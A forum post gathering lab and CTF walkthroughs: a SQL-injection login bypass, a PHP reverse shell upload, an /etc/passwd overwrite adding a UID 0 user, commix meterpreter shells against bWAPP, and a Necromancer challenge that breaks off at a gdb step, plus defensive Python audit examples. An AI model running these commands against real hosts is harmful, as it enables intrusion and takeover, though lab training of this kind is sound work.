04-25-2020, 04:54 AM
Level: Beginner to Intermediate
Task: Boot to Root
Penetration Methodologies
- Network Scanning (Nmap, Netdiscover)
- Use robots.txt
- Apply SQL Injection
- Upload PHP reverse Shell
- Get netcat session
- Edit the /etc/passwd file
- Get Root access and capture the Flag
The first step is as always, running netdiscover on the VM to grab the IP address. In my case, the IP was 192.168.1.127.
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-dvTA42JLcac/W4jkyDRDFhI/AAAAAAAAZ_w/7Ll62wkiRaE0WCyQTPnu8206CRAa28fowCEwYBhgL/s1600/1.png?w=687&ssl=1)
Once the IP was found, we ran an aggressive nmap scan to enumerate all the open ports.
nmap -A 192.168.1.127
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-kJQUT2FyQ2w/W4jkzU3rIlI/AAAAAAAAaA8/4ZUyB0-INs0aQ2ZugYyuAx50KoWQFaTUgCEwYBhgL/s1600/2.png?w=687&ssl=1)
Here you can observe that ports 22 and 8008 are open, and that there is a robots.txt file with 15 allowed and 26 disallowed entries.
The Nmap result shows that our target is running HTTP on port 8008, so we open it in the browser. The message in the box translates to "if I am, I know where to go". We look for a hint in the page source and find a comment at the bottom: "Ok ok, but not here."
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-09hiwfq3Y8s/W4jkzZZEYaI/AAAAAAAAaA8/9MokLa4ft6k5T9cDicKbPtwPYvqr0GSfwCEwYBhgL/s1600/3.png?w=687&ssl=1)
Then I try some of the entries of the robots.txt list found in the Nmap scan results, and fortunately, by exploring /unisxcudkqjydw/ in the browser, I find another directory name, "/vulnbank/".
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-SnEmLtcWZ7g/W4jkztViXmI/AAAAAAAAaA4/po3m1IkhXz0C6RGVVr1MdHlPSZKZxYK2ACEwYBhgL/s1600/4.png?w=687&ssl=1)
So again I explore the new URL in the browser and find a client folder listed in the index page.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-sG5vwd0Zm7s/W4jkz1JVkpI/AAAAAAAAaA0/QHWBMQ3Q6u4_CSf0wg9rAA7lJcbBoMRYwCEwYBhgL/s1600/5.png?w=687&ssl=1)
Clicking on the /client directory, we are greeted by the login page of a "very secure bank", but we don't have login credentials.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-nRYDA-R12zU/W4jk0L73NjI/AAAAAAAAaA0/341ds56MiYozRUJfh_oBL_fyOl3tz_x2ACEwYBhgL/s1600/6.png?w=687&ssl=1)
Therefore, I try SQL injection in the username and password fields, and luckily the following pair gets matched:
Username: ' or 'a' = 'a' --
Password: #
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-nHAGhn_tFLA/W4jk0cm-_zI/AAAAAAAAaAw/F_Dyk-r47KoIFXo9cnkN4XG1KHw-sW18wCEwYBhgL/s1600/7.png?w=687&ssl=1)
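Why that pair logs you in, and what stops it, as an added example that is not part of the original post: a string-concatenated login query beside a parameterised one, run against a constructed in-memory table (the table and column names are assumptions, not taken from the VM), plus a small heuristic for spotting such attempts in login logs.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the bank's login backend; the table
# and column names are assumptions, not taken from the VM.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "s3cret"), ("bob", "hunter2")])
    return db

def login_vulnerable(db, username, password):
    """Builds the query by string concatenation, so the client's input is
    parsed as SQL. Returns the matched username or None."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    # With the payload below the statement becomes
    #   ... WHERE username = '' or 'a' = 'a' --' AND password = '#'
    # 'a' = 'a' is always true and '--' comments out the password check.
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(db, username, password):
    """Binds the same input as parameters; a quote or comment marker in
    the value stays data and never changes the query's structure."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None

# The pair used on the login page above.
PAYLOAD_USER = "' or 'a' = 'a' --"
PAYLOAD_PASS = "#"

# Detection heuristic for credential fields in web or auth logs: a quote
# followed by OR and another quoted literal, or a trailing SQL comment.
TAUTOLOGY = re.compile(r"'\s*or\s+'|--\s*$|/\*", re.IGNORECASE)

def looks_like_tautology(value):
    return TAUTOLOGY.search(value) is not None

if __name__ == "__main__":
    db = make_db()
    print("vulnerable login returns:", login_vulnerable(db, PAYLOAD_USER, PAYLOAD_PASS))
    print("parameterised login returns:", login_safe(db, PAYLOAD_USER, PAYLOAD_PASS))
    print("payload flagged:", looks_like_tautology(PAYLOAD_USER))
```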
And it opened up like a beautiful treasure! As you can see, this web page has a "Contact Support" form where we can attach a file and describe our problem.
So, here is what we did.
Go to the directory holding the PHP reverse shell that ships with Kali: /usr/share/webshells/php/php-reverse-shell.php
Open it with a text editor, set the listening IP and port, save the file as php-reverse-shell.jpg, and start netcat on the listening port.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-8LF8OrdCRBU/W4jk0n0JqtI/AAAAAAAAaA4/eqQNpXye97MgjN8suPRC1UZGq2Hf56V3wCEwYBhgL/s1600/8.png?w=687&ssl=1)
Then we uploaded our PHP shell and executed it to get a reverse connection at netcat.
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-bN48ijBF5lQ/W4jk0yKR9lI/AAAAAAAAaA8/7R3wwX5KS7Awnwg-hlTTyyL73Ounl0baACEwYBhgL/s1600/9.png?w=687&ssl=1)
nc -lvp 1234
In the image below you can observe the netcat session. But the task is not finished yet; we still need to go further for privilege escalation. To get a proper TTY shell we spawned one with a Python one-liner:
python -c 'import pty;pty.spawn("/bin/bash")'
Then I checked the permissions of the passwd file and found that it is writable.
ls -al /etc/passwd
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-I_AyfdhSAlc/W4jkydjyLXI/AAAAAAAAaA4/cdk5KWDXrlkfKjA3rfmYCWdto17IUNzUgCEwYBhgL/s1600/11.png?w=687&ssl=1)
So I dumped the file with cat and copied its whole content into a text file.
cat /etc/passwd
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-yYETJo_1TGI/W4jkyCvPEdI/AAAAAAAAaAs/GZOeHEiPUTkfdKnW8ueog-iY7639xfhaQCEwYBhgL/s1600/12.png?w=687&ssl=1)
In a new terminal we use OpenSSL to generate a new password hash from a salt value and a password with the MD5-based crypt algorithm. For this the command below is used:
openssl passwd -1 -salt ignite pass123
Now copy this salted hash and open the text file into which you copied the /etc/passwd content.
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-5TGTr14Zy_o/W4jkysaTLxI/AAAAAAAAaA4/_nzuTgTkNFQVgJtKfTs0cytMZrNH4P37QCEwYBhgL/s1600/13.png?w=687&ssl=1)
Then we create a new entry for the user "raj" and paste the hash above into it. We also set UID and GID to 0:0 so that the account runs as root and belongs to the root group, and save the file as passwd on the desktop. Now we have to transfer this file to the victim's machine so that we can replace the original passwd file with it. Run a web server on the Kali machine:
python -m SimpleHTTPServer 80
![[Image: 14.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-umWiRXaty2k/W4jkyjqrlgI/AAAAAAAAaA4/NmVCh4EyitoMGCa2-4XFmpsypIPzrJSigCEwYBhgL/s1600/14.png?w=687&ssl=1)
Now download the newly modified passwd file into the /tmp directory and copy it over /etc/passwd, which overwrites the content of the original passwd file.
cd /tmp
wget [URL hidden in the original post: the passwd file served from the Kali machine]
cp passwd /etc/passwd
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-oiVhQOQ93OE/W4jky0evyyI/AAAAAAAAaA8/vsjH6duE5RgL9Vmpc8oSqNPcpbOo1FX9gCEwYBhgL/s1600/15.png?w=687&ssl=1)
When you have done the above steps, switch to your new user and try to gain root access.
su raj
cd /root
ls
cat flag.txt
Wonderful!! We have gained access and captured the flag.
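The edited passwd file above leaves fingerprints a defender can look for: a second UID 0 account, a hash sitting in the password field instead of "x", and a world-writable /etc/passwd. Added example, not part of the original post: a small audit over a constructed passwd sample (the hash string is a placeholder) and a permission check like the `ls -al` step.

```python
import os
import stat

# Constructed sample modelled on the step above: a second UID 0 / GID 0
# account whose hash sits directly in passwd (hash value is a placeholder).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
raj:$1$ignite$PLACEHOLDERHASH:0:0:raj:/root:/bin/bash
"""

# Values that legitimately appear in the second field of /etc/passwd:
# "x" (hash lives in /etc/shadow) or a locked marker.
SHADOWED_OR_LOCKED = ("x", "*", "!", "!!")

def audit_passwd(text):
    """Returns (name, issue) pairs for the conditions an edited passwd file
    produces: extra UID 0 / GID 0 accounts, a hash stored in passwd instead
    of 'x' (shadow bypassed), empty passwords, duplicate or malformed
    entries."""
    findings = []
    seen = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("line %d" % lineno, "malformed-entry"))
            continue
        name, pw, uid, gid = fields[0], fields[1], fields[2], fields[3]
        if name in seen:
            findings.append((name, "duplicate-name"))
        seen.add(name)
        if pw == "":
            findings.append((name, "empty-password"))
        elif pw not in SHADOWED_OR_LOCKED:
            findings.append((name, "hash-in-passwd"))
        if uid == "0" and name != "root":
            findings.append((name, "uid-0"))
        if gid == "0" and name != "root":
            findings.append((name, "gid-0"))
    return findings

def is_world_writable(path):
    """The condition 'ls -al /etc/passwd' revealed on the VM."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)

def audit_passwd_file(path="/etc/passwd"):
    """Content findings plus a permission finding for a real file."""
    with open(path) as f:
        findings = audit_passwd(f.read())
    if is_world_writable(path):
        findings.append((path, "world-writable"))
    return findings

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print("%-12s %s" % finding)
    if os.path.exists("/etc/passwd"):
        print("/etc/passwd world-writable:", is_world_writable("/etc/passwd"))
```

Run periodically or from a file-integrity job; any "uid-0" or "world-writable" finding on a real host warrants an incident ticket, not a quiet fix.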
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
This attack differs from code injection, in that code injection allows the attacker to add his own code that is then executed by the application. In code injection, the attacker extends the default functionality of the application without the necessity of executing system commands. (Source: link hidden in the original post.)
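What "passing unsafe user supplied data to a system shell" looks like in code, as an added example that is not part of the original post or of bWAPP: the ping lookup pattern the bWAPP pages exercise, first as a shell string built from the raw target field, then hardened with an allowlist validator and an argv list run without a shell, plus a log-side heuristic for the metacharacters such an injection needs. The function names are mine.

```python
import ipaddress
import re
import subprocess

# Syntactic hostname: labels of 1-63 alphanumerics/hyphens, no leading or
# trailing hyphen, joined by dots.
HOSTNAME = re.compile(r"[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
                      r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*")

def ping_command_vulnerable(target):
    """The bug class behind a page like commandi_blind.php: the raw
    'target' field is spliced into a shell command line. Returned as a
    string here for illustration, deliberately never passed to a shell."""
    return "ping -c 1 " + target

def validate_target(target):
    """Allowlist: an IPv4/IPv6 literal or a syntactically valid hostname.
    Anything else (shell metacharacters, spaces, newlines) is rejected."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if len(target) <= 253 and HOSTNAME.fullmatch(target):
        return target
    raise ValueError("target is not an IP address or hostname: %r" % target)

def ping_argv_safe(target):
    """argv list for subprocess with shell=False: the validated target is a
    single argument to ping and is never interpreted by a shell."""
    return ["ping", "-c", "1", validate_target(target)]

def run_ping(target, timeout=5):
    """Runs the hardened command and returns ping's stdout."""
    result = subprocess.run(ping_argv_safe(target), capture_output=True,
                            text=True, timeout=timeout, shell=False)
    return result.stdout

# Detection heuristic for the 'target' form field in web server or WAF
# logs: command separators, pipes, substitution and redirection.
METACHARS = re.compile(r"[;&|`$<>\n\r]")

def has_shell_metachars(value):
    return METACHARS.search(value) is not None

if __name__ == "__main__":
    injected = "192.168.1.101; id"        # constructed sample input
    print("shell would run:", ping_command_vulnerable(injected))
    print("flagged:", has_shell_metachars(injected))
    try:
        ping_argv_safe(injected)
    except ValueError as err:
        print("rejected:", err)
    print("argv:", ping_argv_safe("192.168.1.101"))
```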
Requirement:
Xampp/Wamp Server
bWAPP Lab
Kali Linux: Burp suite, Commix tool
You need to install the bWAPP lab in your XAMPP or WAMP server; for this you can follow the guide "Web Pentest Lab Setup using bWAPP" (link hidden in the original post). Our task is to get a meterpreter shell through an OS command injection (blind) attack using bWAPP.
Start the Apache and MySQL services in XAMPP or WAMP. Open the localhost address in the browser; I am using 192.168.1.103:81/bWAPP/login.php. Enter the user and password bee and bug respectively.
My task is to bypass all three security levels in bWAPP through OS command injection.
Let's start!!!!
Set the security level to low, choose the bug "OS Command Injection - Blind" from the list box and click on Hack.
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-dKkTNDeWYu8/WEGIhyPoC3I/AAAAAAAAOfA/Z5Nr8E0vAogJbsw_PbeubDHTiN175wEkwCLcB/s640/1.png?w=687&ssl=1)
Type your IP in the text field and just after that start Burp Suite in Kali Linux. Don't forget to set the proxy in your browser while using Burp Suite.
To capture the cookie of bWAPP, click on the Proxy tab, turn Intercept on, come back to bWAPP and click the PING button.
Look at the image; you will find that I have got the details.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-iVjNm7PxmPU/WEGIi227DUI/AAAAAAAAOfQ/ii7muYofPE0LMI-AOfsjhGJu-uZjMLB-wCLcB/s640/2.png?w=687&ssl=1)
From the intercepted data in Burp Suite, copy the referer, cookie and target and use them in the following command:
commix --url="http://192.168.1.101:81/bWAPP/commandi_blind.php" --data="target=192.168.1.101&form=submit" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=5m82jlcacsvb2rfmn73gt3egi2"
This command runs the commix tool in the terminal, which automatically performs the command injection attack against bWAPP using the URL and cookie information.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-y9dO2DoKoMs/WEGIjGqCuEI/AAAAAAAAOfU/NMgRqKzv4RgPczawZiWFGNT93vp1Msx9wCLcB/s640/3.png?w=687&ssl=1)
Type 'y' to resume the classic injection point and to get a pseudo-terminal shell.
Here we got the commix OS shell, but our aim is a meterpreter shell; for that we need to type the following commands.
commix(os_shell) > reverse_tcp
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-U_60uzR8z1Y/WEGIjFFUenI/AAAAAAAAOfY/HUtdkBglTIA4-a-FmWHMdWVy4SD9oCSXwCLcB/s640/4.png?w=687&ssl=1)
commix(reverse_tcp) > set LHOST 192.168.1.101
commix(reverse_tcp) > set LPORT 4444
Commix asks which backdoor to use for the connection; type '2' for other reverse TCP shells.
commix(reverse_tcp) > 2
Commix asks which payload to use; type '7' for a Windows meterpreter reverse TCP shell.
commix(reverse_tcp) > 7
Commix asks which PowerShell injection attack to use; type '2' for TrustedSec's Magic Unicorn.
commix(reverse_tcp) > 2
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-wx3jqXGGFJQ/WEGIjf43VSI/AAAAAAAAOfc/jUveSka_F_EBGlQYulMQUOZPs5Dilz7lQCLcB/s640/5.png?w=687&ssl=1)
The step above generates the payload and prints the command marked in the image; copy the whole command "msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc" and paste it into a new terminal, which starts the multi/handler on its own.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-cKqdACa-WPo/WEGIjor3PrI/AAAAAAAAOfg/w-s0TKOgfZY3Oq1G2PnZeeg7NiGIJjE4QCLcB/s640/6.png?w=687&ssl=1)
Once the Metasploit framework has loaded and started the payload handler, come back to your previous terminal and press Enter, as shown in the image.
Luckily!! We succeeded in our task; we have got a meterpreter shell.
meterpreter > sysinfo
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-M9C1LAQ-IO4/WEGIkwW3AJI/AAAAAAAAOfw/HzyqszkCLu4WbJ_2YKm7HnLx6OAd9PM1QCLcB/s640/7.png?w=687&ssl=1)
We are going to perform the same task with the same process but with another type of vulnerability. Set the security level to low, choose the bug "OS Command Injection" from the list box and click on Hack.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-pDIQmarJe0Y/WEGIkEWa_VI/AAAAAAAAOfk/Yjd1IzGDuIUUfvEuNrwOEXIYoJIR2Oo6QCLcB/s640/8.png?w=687&ssl=1)
Type your IP in the DNS lookup field and just after that start Burp Suite and set the manual proxy in the browser. Click on the Proxy tab, turn Intercept on, come back to bWAPP and click on Lookup.
![[Image: 9.1.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-oVZOoXdalIw/WEGIkXioD3I/AAAAAAAAOfo/hYRzw2bMiXw_GOtv2J3cUoGtGXV4OKdeQCLcB/s640/9.1.png?w=687&ssl=1)
commix --url="http://192.168.1.101:81/bWAPP/commandi.php" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=1; PHPSESSID=79egt1piglgkadfnaa6dujass7" --data="target=192.168.1.101&form=submit"
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-tKhe6Tzv6x0/WEGIkgSo8MI/AAAAAAAAOfs/8GujD9OYeYQW1IKi8ivIzLw32Nu820bMACLcB/s640/9.png?w=687&ssl=1)
Type 'y' to resume the classic injection point and to get a pseudo-terminal shell.
Here we got the commix OS shell, but our aim is a meterpreter shell; for that we need to type the following commands.
commix(os_shell) > reverse_tcp
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-E7vkp0vxGLo/WEGIhulyLFI/AAAAAAAAOe4/7861P0oRvis3vEsDSpm2NkYzZf639HpZgCLcB/s640/10.png?w=687&ssl=1)
commix(reverse_tcp) > set LHOST 192.168.1.101
commix(reverse_tcp) > set LPORT 4444
Commix asks which backdoor to use for the connection; type '2' for other reverse TCP shells.
commix(reverse_tcp) > 2
Commix asks which payload to use; type '7' for a Windows meterpreter reverse TCP shell.
commix(reverse_tcp) > 7
Commix asks which PowerShell injection attack to use; type '2' for TrustedSec's Magic Unicorn.
commix(reverse_tcp) > 2
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-kLOYYtkbCc8/WEGIhhqr4oI/AAAAAAAAOe8/fcsDsGSH28MBj_BZ6Nn4gywQAeAQNd1ygCLcB/s640/12.png?w=687&ssl=1)
The step above generates the payload and prints the command marked in the image; copy the whole command "msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc" and paste it into a new terminal, which starts the multi/handler on its own.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-wjQuvONgWmQ/WEGIiaNB7YI/AAAAAAAAOfE/8N5stKCHQkA_Y_eG7lrt7Y4777olaKGnQCLcB/s640/13.png?w=687&ssl=1)
Once the Metasploit framework has loaded and started the payload handler, come back to your previous terminal and press Enter, as shown in the image.
Luckily!! Again we succeeded in our task; we have got a meterpreter shell.
meterpreter > sysinfo
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-EP5U2HRYoy8/WEGIiY9_XCI/AAAAAAAAOfM/zlc6Q5xPhKE67a-k_F7ruehI_4wl8LiZACLcB/s640/15.png?w=687&ssl=1)
The Necromancer boot2root box was created for a recent SecTalks Brisbane CTF competition. There are 11 flags to collect on your way to solving the challenge. The end goal is simple…. Destroy the Necromancer!
You can download Necromancer from the link hidden in the original post. Let's get going. Firstly, we run netdiscover:
netdiscover
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-yH4j71GHj-k/WEEXK0aeXfI/AAAAAAAAOao/wfYGqLRdH3U-YUQlQnklUYXLJzrYrqzggCLcB/s1600/1.png?w=687&ssl=1)
nmap -A -p- 192.168.0.110
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-cW9m9g_pPes/WEEXNCUDFdI/AAAAAAAAOaw/hQDLqdcDsvk3ZbIEsgtk8anu-NYc0EDBACEw/s640/2.png?w=687&ssl=1)
The scan takes a bit of time and gives us nothing. So, let's try a UDP scan using nmap.
nmap -sU -T4 -p- 192.168.0.110
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-9aUW1ifz88I/WEEXNQeDCfI/AAAAAAAAOa0/vCOKM7rwayMhtj7QwqSpCHHCGne96MOdwCEw/s1600/3.png?w=687&ssl=1)
We get UDP port 666 open. Let's try netcat on it.
nc -nvu 192.168.0.110 666
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-HCfLZ1QIk8s/WEEXNpNOOfI/AAAAAAAAOa4/cqwRu05tK0IvRAg6T_kWW_nWT_VEHjp-gCEw/s1600/4.png?w=687&ssl=1)
No matter how many times we hit Enter, we get the same reply: "You gasp for air! Time is running out!"
When we started the machine (Necromancer), we saw a message regarding the IP: "Renewal in 3600 seconds". This seems to be related to the message on our terminal.
Let’s quickly run tcpdump.
tcpdump host 192.168.0.110
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-J-YTcov5KM4/WEEXRq1oPXI/AAAAAAAAOa8/O9AdWd3y2nQ3OE8AXu7vD_Cnt4YUg8PdgCEw/s640/5.png?w=687&ssl=1)
We learn about some gateway on 4444. This could be another port on our target. Let's use netcat once again.
nc -nvlp 4444
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-2jcrB0AEwCg/WEEXUuDdkoI/AAAAAAAAObE/uUYAGWHB7U4zKkVim3QbXPw5HpXkY2UBQCEw/s640/6.png?w=687&ssl=1)
We decode the text received on port 4444 (the decoding site used in the original post is hidden) and get some sensible text.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-Nt2e4nAdNXM/WEEXSRbIgcI/AAAAAAAAObA/1qu36n8oLh4YuDr3g9CqdvK9mgT5VsOhQCEw/s640/7.png?w=687&ssl=1)
Ok. We have our 1st flag, and a message to chant the flag's string at UDP port 666. The flag1 text looks like an md5 hash, so we look it up in an online hash-cracking service (the link is hidden in the original post). It decrypts to "opensesame". Let's return to port 666 using netcat and type in this string there.
nc -nvu 192.168.0.110 666
opensesame
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-cvSCERQRfXI/WEEXW_nzhxI/AAAAAAAAObI/x8bP4f9pQBEgp_pAi-KCDAY3EkWyLukWQCEw/s640/8.png?w=687&ssl=1)
Another hint. The numeral 80 reminds us of port 80, used for HTTP. Let's open the victim machine's IP in our browser on port 80.
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-NgypTR5uNg4/WEEXXCJxVkI/AAAAAAAAObM/epsFjMSQI8sXPS1iIgahFjdSRQbjJO1gwCEw/s640/9.png?w=687&ssl=1)
binwalk /root/Desktop/pileoffeathers.jpg
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-5-KgpPs4qec/WEEiNdkMEcI/AAAAAAAAOeo/R5843X4AowkPzM13Fk7W0omauZzJWc6MACLcB/s640/10.png?w=687&ssl=1)
So we discover that the image is actually a zip archive. Let’s rename it.
mv /root/Desktop/pileoffeathers.jpg /root/Desktop/pileoffeathers.zip
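Both the php-reverse-shell.jpg upload earlier on this page and the zip-inside-a-JPEG found here rely on the file's extension saying one thing while its bytes say another. Added example, not code from the original post or from either VM: an upload gate that checks magic bytes against the claimed extension and scans for embedded PHP tags and ZIP headers (the binwalk finding above, done by hand), run over constructed sample blobs.

```python
import os

# Leading bytes for the image types an upload form typically allows.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
ZIP_MAGIC = b"PK\x03\x04"                       # ZIP local file header
PHP_TAGS = (b"<?php", b"<?=", b"<script language=\"php\"")

def find_embedded_zip(data):
    """Offset of the first ZIP local-file header inside data, or -1: the
    observation binwalk made on pileoffeathers.jpg above."""
    return data.find(ZIP_MAGIC)

def classify_upload(filename, data):
    """Returns 'accept' or a 'reject: <reason>' string for an upload."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in IMAGE_MAGIC:
        return "reject: extension not allowed"
    # bytes.startswith accepts a tuple of candidates
    if not data.startswith(IMAGE_MAGIC[ext]):
        return "reject: content does not match extension"
    if any(tag in data for tag in PHP_TAGS):
        return "reject: PHP code embedded in image"
    if find_embedded_zip(data) != -1:
        return "reject: archive embedded in image"
    return "accept"

# Constructed samples (not the real files from either VM).
REVERSE_SHELL_AS_JPG = b"<?php\n// shell body would follow here\n?>\n"
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32 + b"\xff\xd9"
JPEG_WITH_PHP = REAL_JPEG + b"<?php echo 'hidden'; ?>"
JPEG_WITH_ZIP = REAL_JPEG + ZIP_MAGIC + b"\x14\x00" + b"\x00" * 26 + b"flag.txt"

if __name__ == "__main__":
    for name, blob in [("php-reverse-shell.jpg", REVERSE_SHELL_AS_JPG),
                       ("photo.jpg", REAL_JPEG),
                       ("photo.jpg", JPEG_WITH_PHP),
                       ("pileoffeathers.jpg", JPEG_WITH_ZIP)]:
        print("%-22s -> %s" % (name, classify_upload(name, blob)))
    print("zip header offset:", find_embedded_zip(JPEG_WITH_ZIP))
```

Content checks are a second line of defence; the upload directory must also be served without script execution, otherwise a renamed file that passes this gate is still one misconfiguration away from running.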
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-HznYC7FgLmw/WEEZIMK0QxI/AAAAAAAAObY/4ji_9X9CVP8gDAhRMNnQa2tMH_pYAsAwACLcB/s640/11.png?w=687&ssl=1)
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-EP2iy6lEHhA/WEEZHqukbWI/AAAAAAAAObU/FJ5I9ykpiK4M_-ONhctmP368qGb0xlY3ACLcB/s640/12.png?w=687&ssl=1)
Opening the directory in our browser, we are greeted by another web page with no clues at all this time. It only tells us that we need a magical item that could protect us from the Necromancer's spell. We google for "magic items wiki" and find some good stuff on the very first link. But what next?
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-oeA5yT_MEXU/WEEZKAUVmHI/AAAAAAAAObk/SG3pWJEoz1cbfbWxL6XJBTNxVmCOnVXegCLcB/s640/14.png?w=687&ssl=1)
cewl https://en.wikipedia.org/wiki/List_of_mythological_objects -d 0 -w /root/Desktop/magicItems.txt -v
![[Image: 15.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-uK747IbXVWY/WEEZJSf8sHI/AAAAAAAAObc/JQ49fGCf2CwsInWPWgQwDMoDti73L7qGwCLcB/s640/15.png?w=687&ssl=1)
This makes a dictionary of magical items on our desktop. Let us try dirb with it to get our next clue.
dirb [target URL hidden in the original post] /root/Desktop/magicItems.txt
![[Image: 16.1.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-OolJEaulJPc/WEEZJqAbw0I/AAAAAAAAObg/RwgcKNN9l9EpvBbxtz19Y1FrUWChCkNIQCLcB/s640/16.1.png?w=687&ssl=1)
We get another directory as a result: "talisman".
![[Image: 16.2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-Jl2iNiktXlI/WEEZK5Dv99I/AAAAAAAAObo/hAspkCEqXJo-ONjCx-3dPB2Cg_MxTixtQCLcB/s640/16.2.png?w=687&ssl=1)
When we visit the url now using talisman, we are asked to download a binary file named talisman.
![[Image: 16.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-GP8qD9X-eFk/WEEZNHLRrOI/AAAAAAAAObw/uUXmDnlxMh4aVNvhnWnhrHFl6QzeqN_DgCLcB/s640/16.png?w=687&ssl=1)
chmod 777 /root/Desktop/talisman
Thereafter we run the file by going to its location.
./talisman
![[Image: 17.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-edExtKXCZrI/WEEZLt7VmlI/AAAAAAAAObs/keDyedYNHPgUjFRo_gF_f8Uv-tNSdtevACLcB/s640/17.png?w=687&ssl=1)
No matter what we answer to the question "Do you want to wear the talisman?", the result is the same: "Nothing happens". So let's try to debug the binary.
gdb /root/Desktop/talisman
